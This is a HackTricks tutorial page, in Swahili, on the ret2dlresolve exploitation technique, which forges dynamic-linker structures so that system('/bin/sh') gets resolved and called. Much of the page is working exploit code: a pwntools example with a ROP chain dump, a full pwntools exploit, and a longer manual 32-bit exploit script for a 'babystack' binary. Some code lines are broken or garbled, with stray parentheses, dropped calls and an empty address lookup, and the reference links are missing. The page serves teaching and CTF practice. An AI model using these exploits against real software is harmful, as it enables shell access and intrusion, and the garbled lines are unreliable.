
Support HackTricks

Taarifa Msingi

Kama ilivyoelezwa kwenye ukurasa kuhusu GOT/PLT na Relro, binaries bila Full Relro zitaresolve alama (kama vile anwani za maktaba za nje) mara ya kwanza zinapotumiwa. Urekebishaji huu hufanyika kwa kuita kazi ya _dl_runtime_resolve.

Kazi ya _dl_runtime_resolve huchukua kutoka kwenye steki marejeo kwa baadhi ya miundo inayohitajika ili kuresolve alama iliyotajwa.

Hivyo basi, niwezekano wa kuiga miundo yote hii ili kufanya urekebishaji wa kiungo cha kudaiwa (kama vile kazi ya system) na kuipiga na parameta iliyowekwa (k.m. system('/bin/sh')).

Kawaida, miundo yote hii huiigwa kwa kutengeneza mnyororo wa ROP wa awali unaopiga read juu ya kumbukumbu inayoweza kuandikwa, kisha miundo na neno '/bin/sh' hupitishwa ili waweze kuhifadhiwa na kusomwa kwa kujulikana, na kisha mnyororo wa ROP unaendelea kwa kupiga _dl_runtime_resolve, ikimruhusu kuresolve anwani ya system kwenye miundo bandia na kumpigia anwani hii na anwani ya $'/bin/sh'.

Mbinu hii ni muhimu hasa ikiwa hakuna vifaa vya syscall (kutumia mbinu kama ret2syscall au SROP) na hakuna njia ya kuvuja kwa anwani za libc.

Angalia video hii kwa maelezo mazuri kuhusu mbinu hii katika nusu ya pili ya video:

Au angalia kurasa hizi kwa maelezo hatua kwa hatua:

Muhtasari wa Shambulio

  1. Andika miundo bandia mahali fulani

  2. Weka hoja ya kwanza ya system ($rdi = &'/bin/sh')

  3. Weka kwenye steki anwani za miundo kuita _dl_runtime_resolve

  4. Piga _dl_runtime_resolve

  5. system itaresolviwa na kupigwa na '/bin/sh' kama hoja

Kutoka kwenye hati za pwntools, hivi ndivyo shambulio la ret2dlresolve linavyoonekana:

context.binary = elf = ELF('amd64'))
>>> rop = ROP(elf)
>>> dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])
>>>, dlresolve.data_addr) # do not forget this step, but use whatever function you like
>>> rop.ret2dlresolve(dlresolve)
>>> raw_rop = rop.chain()
>>> print(rop.dump())
0x0000:         0x400593 pop rdi; ret
0x0008:              0x0 [arg0] rdi = 0
0x0010:         0x400591 pop rsi; pop r15; ret
0x0018:         0x601e00 [arg1] rsi = 6299136
0x0020:      b'iaaajaaa' <pad r15>
0x0028:         0x4003f0 read
0x0030:         0x400593 pop rdi; ret
0x0038:         0x601e48 [arg0] rdi = 6299208
0x0040:         0x4003e0 [plt_init] system
0x0048:          0x15670 [dlresolve index]


Pwntools Safi

Unaweza kupata mfano wa mbinu hii hapa ukiwa na maelezo mazuri sana ya mnyororo wa mwisho wa ROP, lakini hapa kuna shambulizi la mwisho lililotumika:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76), dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in



# Code from
# This exploit is based off of:

from pwn import *

target = process('./babystack')

elf = ELF('babystack')

# Establish starts of various sections
bss = 0x804a020

dynstr = 0x804822c

dynsym = 0x80481cc

relplt = 0x80482b0

# Establish two functions

scanInput = p32(0x804843b)
resolve = p32(0x80482f0) #dlresolve address

# Establish size of second payload

payload1_size = 43

# Our first scan
# This will call read to scan in our fake entries into the plt
# Then return back to scanInput to re-exploit the bug

payload0 = ""

payload0 += "0"*44                        # Filler from start of input to return address
payload0 += p32(elf.symbols['read'])    # Return read
payload0 += scanInput                    # After the read call, return to scan input
payload0 += p32(0)                        # Read via stdin
payload0 += p32(bss)                    # Scan into the start of the bss
payload0 += p32(payload1_size)            # How much data to scan in


# Our second scan
# This will be scanned into the start of the bss
# It will contain the fake entries for our ret_2_dl_resolve attack

# Calculate the r_info value
# It will provide an index to our dynsym entry
dynsym_offset = ((bss + 0xc) - dynsym) / 0x10
r_info = (dynsym_offset << 8) | 0x7

# Calculate the offset from the start of dynstr section to our dynstr entry
dynstr_index = (bss + 28) - dynstr

paylaod1 = ""

# Our .rel.plt entry
paylaod1 += p32(['alarm'])
paylaod1 += p32(r_info)

# Empty
paylaod1 += p32(0x0)

# Our dynsm entry
paylaod1 += p32(dynstr_index)
paylaod1 += p32(0xde)*3

# Our dynstr entry
paylaod1 += "system\x00"

# Store "/bin/sh" here so we can have a pointer ot it
paylaod1 += "/bin/sh\x00"


# Our third scan, which will execute the ret_2_dl_resolve
# This will just call 0x80482f0, which is responsible for calling the functions for resolving
# We will pass it the `.rel.plt` index for our fake entry
# As well as the arguments for system

# Calculate address of "/bin/sh"
binsh_bss_address = bss + 35

# Calculate the .rel.plt offset
ret_plt_offset = bss - relplt

paylaod2 = ""

paylaod2 += "0"*44
paylaod2 += resolve                 # 0x80482f0
paylaod2 += p32(ret_plt_offset)        # .rel.plt offset
paylaod2 += p32(0xdeadbeef)            # The next return address after 0x80482f0, really doesn't matter for us
paylaod2 += p32(binsh_bss_address)    # Our argument, address of "/bin/sh"


# Enjoy the shell!

Mifano Mingine & Marejeo

Support HackTricks

Last updated